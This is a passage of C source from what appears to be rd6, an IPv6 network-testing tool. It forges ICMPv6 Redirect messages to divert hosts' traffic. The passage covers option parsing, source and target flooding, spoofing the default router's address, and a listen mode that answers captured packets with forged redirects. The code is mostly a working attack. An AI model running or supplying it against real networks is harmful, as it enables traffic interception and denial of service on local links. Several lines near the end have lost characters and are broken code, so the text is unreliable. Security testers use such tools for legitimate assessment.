case 'E': /* Target link-layer option */ tllaopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } nlinkaddr++; tllaopta_f=1; break; case 'r': /* IPv6 Redirected Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Redirected Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &rediraddr) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } rediraddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ redirpreflen = atoi(charptr); if(redirpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&rediraddr, redirpreflen); redirprefix_f=1; } break; case 't': /* Target Address to which traffic will be redirected */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Target Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'p': /* Protocol used in the redirected header */ if(strcmp(optarg, "TCP") == 0) rhtcp_f = 1; else if(strcmp(optarg, "ICMP6") == 0) rhicmp6_f = 1; else if(strcmp(optarg, "UDP") == 0) rhudp_f = 1; else{ puts("Unsupported protocol in option '-p'"); exit(EXIT_FAILURE); } break; case 'P': /* Payload Size*/ rhlength= atoi(optarg); rhlength= (rhlength<<3) >> 3; /* The Redirected Header has a granularity of 8 bytes */ rhlength_f= 1; break; case 'n': /* No Redirected Header */ norheader_f=1; break; case 'c': /* Hop Limit of the IPv6 Payload */ ip6hoplimit= atoi(optarg); ip6hoplimit_f=1; break; case 'x': /* Redirected peer address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } peeraddr= targetipv6.ip6; peeraddr_f = 1; break; case 'o': /* Redir port */ redirport= atoi(optarg); redirport_f= 1; break; case 'a': /* Peer port */ peerport= atoi(optarg); peerport_f= 1; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'M': /* Respond to multicast packets */ respmcast_f=1; break; case 'O': /* Make Destination On-Link */ makeonlink_f=1; break; case 'N': /* Learn Router */ learnrouter_f= 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'f': /* Sanity filters */ sanityfilters_f=1; break; case 'R': /* Flood Redirected */ nredirs= atoi(optarg); if(nredirs == 0){ puts("Invalid number of Redirects in option -R"); exit(EXIT_FAILURE); } floodr_f= 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ idata.listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("rd6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(idata.listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(idata.listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); idata.srcpreflen=64; } if(!floods_f && !idata.srcaddr_f && !learnrouter_f){ puts("Must specify IPv6 Source Address (usually to that of the current default router)"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !idata.listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(!idata.hsrcaddr_f && !learnrouter_f) /* Source link-layer address is randomized by default */ randomize_ether_addr(&(idata.hsrcaddr)); if(!idata.hdstaddr_f && idata.dstaddr_f){ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &idata.hdstaddr, sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } if(learnrouter_f){ randomize_ether_addr(&rs_ether); ether_to_ipv6_linklocal(&rs_ether, &rs_ipv6); if(find_ipv6_router(idata.pfd, &rs_ether, &rs_ipv6, &router_ether, &router_ipv6) != 0){ puts("Failed learning default IPv6 router"); exit(EXIT_FAILURE); } if(!idata.hsrcaddr_f){ idata.hsrcaddr= router_ether; idata.hsrcaddr_f=1; } if(!idata.srcaddr_f){ idata.srcaddr= router_ipv6; idata.srcaddr_f= 1; } } release_privileges(); srandom(time(NULL)); if(tllaopt_f && !tllaopta_f){ if(idata.hsrcaddr_f){ /* The value of the target link-layer address */ linkaddr[0] = idata.hsrcaddr; /* option defaults to the Ethernet Source Address */ nlinkaddr++; } else{ puts("Must specify the link-layer Source Address when the '-e' option is selected"); exit(EXIT_FAILURE); } } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &targetaddr) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&targetaddr, &targetaddr, 64); targetpreflen=64; } if(!floodt_f && !targetaddr_f){ if(!makeonlink_f){ puts("Must specify Redirect Target Address"); exit(EXIT_FAILURE); } else if(!floodr_f){ targetaddr= rediraddr; targetaddr_f=1; } } /* If the "flood destination" option was set, but no prefix was specified for the "redirected destination", we select random addressses (from ::/0) */ if(floodr_f && !redirprefix_f){ for(i=0;i<16;i++) rediraddr.s6_addr[i]=0x00; redirpreflen=0; } if(!floods_f) nsources=1; if(!floodt_f) ntargets=1; if(!floodr_f) nredirs=1; if(sanityfilters_f){ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters while adding sanity filters."); exit(EXIT_FAILURE); } if(learnrouter_f) filters.acceptlinkdst[filters.nacceptlinkdst]= router_ether; else filters.acceptlinkdst[filters.nacceptlinkdst]= idata.hsrcaddr; filters.nacceptlinkdst++; filters.acceptfilters_f=1; if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters while adding sanity filters."); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, "fe80::", &(filters.blocksrc[filters.nblocksrc])) <= 0){ puts("Error while adding sanity filter for link-local addresses."); exit(EXIT_FAILURE); } filters.blocksrclen[filters.nblocksrc] = 16; filters.nblocksrc++; } if(!sleep_f) nsleep=1; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(!norheader_f && !(rhtcp_f || rhudp_f || rhicmp6_f)) rhdefault_f=1; if(!ip6hoplimit_f) ip6hoplimit=255; if(!ip6length_f) ip6length=1460; if(!peeraddr_f) peeraddr= idata.dstaddr; if(rhtcp_f || rhdefault_f){ if(!tcpflags_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); if(!tcpwin_f) tcpwin= ((uint16_t) random() + 1500) & (uint16_t)0x7f00; if(!peerport_f) peerport= random(); if(!redirport_f) redirport= random(); if(!tcpurg_f) tcpurg= 0; } if(rhudp_f){ if(!peerport_f) peerport= random(); if(!redirport_f) redirport= random(); } if(rhicmp6_f){ if(!icmp6id_f) icmp6id= random(); if(!icmp6seq_f) icmp6seq= random(); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for IPv6 packets (find_ipv6_router() set its own filters before receiving RAs) */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_IPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an ICMPv6 Redirect if an IPv6 Destination Address was specified */ if((idata.dstaddr_f) && (targetaddr_f || floodt_f) && (rediraddr_f || floodr_f)){ send_packet(&idata, NULL, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Redirect Messages every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL, NULL); } } exit(EXIT_SUCCESS); } if(idata.listen_f){ if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 messages..."); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); while(idata.listen_f){ rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=1000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(FD_ISSET(idata.fd, &rset)){ #endif /* Read an IPv6 packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Redirect message */ send_packet(&idata, pktdata, pkthdr); } } } exit(EXIT_SUCCESS); } if(!(idata.dstaddr_f && (targetaddr_f || floodt_f) && (rediraddr_f || floodr_f)) && !idata.listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer + idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_redirect)) > (v6buffer + idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 Redirect header (should be using Frag. option?)"); exit(EXIT_FAILURE); } rd= (struct nd_redirect *) ptr; rd->nd_rd_type = ND_REDIRECT; rd->nd_rd_code = 0; rd->nd_rd_reserved = 0; rd->nd_rd_target = targetaddr; rd->nd_rd_dst = rediraddr; ptr += sizeof(struct nd_redirect); if(tllaopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer + idata->max_packet_size) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; memcpy(tllaopt->address, linkaddr[0].a, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ puts("Packet Too Large while processing target link-layer address option"); exit(EXIT_FAILURE); } } startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ if(pktdata != NULL){ /* Sending a Redirect in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen; pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We respond to packets sent to a multicast address only if the tool has been explicitly instructed to do so. */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) && !respmcast_f) return; rd->nd_rd_dst = pkt_ipv6->ip6_dst; } sources=0; do{ if(floods_f){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and srcpreflen. */ randomize_ipv6_addr(&(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); if(!idata->hsrcaddr_f){ randomize_ether_addr(&(ethernet->src)); } if(tllaopt_f && !tllaopta_f){ memcpy(tllaopt->address, ethernet->src.a, ETH_ALEN); } } redirs=0; do{ if(floodr_f){ /* Randomizing the Redirected Address based on the prefix specified by rediraddr and redirpreflen. */ randomize_ipv6_addr(&(rd->nd_rd_dst), &rediraddr, redirpreflen); } targets=0; do{ if(floodt_f){ /* Randomizing the Redirect Target Address based on the prefix specified by targetaddr and targetpreflen. */ randomize_ipv6_addr(&(rd->nd_rd_target), &targetaddr, targetpreflen); } else if(makeonlink_f){ /* Code used to check for makeonlink_f && floodr_f */ /* The target field contains the address specified by the "-t" option. Otherwise (if we must make the address "on-link", the ND target field is set to the same value as the RD Destination Address */ rd->nd_rd_target= rd->nd_rd_dst; } /* * If a single target link-layer address option is to be included, it is included * by init_packet_data() */ if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; ptr=startofprefixes; while(linkaddrsmax_packet_size){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; memcpy(tllaopt->address, linkaddr[linkaddrs].a, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); linkaddrs++; newdata_f=1; } if(linkaddrs 1280) rhbytes=48; else rhbytes= 1280- currentsize - sizeof(struct nd_opt_rd_hdr); } pktbytes= pkt_end - (unsigned char*) pkt_ipv6; if( rhbytes > pktbytes) rhbytes= pktbytes; rhbytes= (rhbytes>>3) << 3; if( (ptr+sizeof(struct nd_opt_rd_hdr)+rhbytes) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rh = (struct nd_opt_rd_hdr *) ptr; rh->nd_opt_rh_type = ND_OPT_REDIRECTED_HEADER; rh->nd_opt_rh_len = rhbytes/8 + 1; rh->nd_opt_rh_reserved1= 0; rh->nd_opt_rh_reserved2= 0; ptr+= sizeof(struct nd_opt_rd_hdr); memcpy(ptr, pkt_ipv6, rhbytes); ptr+= rhbytes; } else{ /* The Redirect is *not* being sent in response to a received packet */ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if( (currentsize+sizeof(struct nd_opt_rd_hdr)) > 1280) rhbytes=48; else rhbytes= 1280- currentsize - sizeof(struct nd_opt_rd_hdr); } rhbytes= (rhbytes>>3) << 3; if( (ptr+sizeof(struct nd_opt_rd_hdr)+rhbytes) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rh = (struct nd_opt_rd_hdr *) ptr; rh->nd_opt_rh_type = ND_OPT_REDIRECTED_HEADER; rh->nd_opt_rh_len = rhbytes/8 + 1; rh->nd_opt_rh_reserved1= 0; rh->nd_opt_rh_reserved2= 0; ptr+= sizeof(struct nd_opt_rd_hdr); rhipv6 = (struct ip6_hdr *) rhbuff; rhipv6->ip6_flow= 0; rhipv6->ip6_vfc= 0x60; rhipv6->ip6_plen= htons(ip6length); rhipv6->ip6_hlim= ip6hoplimit; rhipv6->ip6_src= peeraddr; rhipv6->ip6_dst= rd->nd_rd_dst; if(rhtcp_f || rhdefault_f){ rhipv6->ip6_nxt= IPPROTO_TCP; rhtcp= (struct tcp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); memset(rhtcp, 0, sizeof(struct tcp_hdr)); 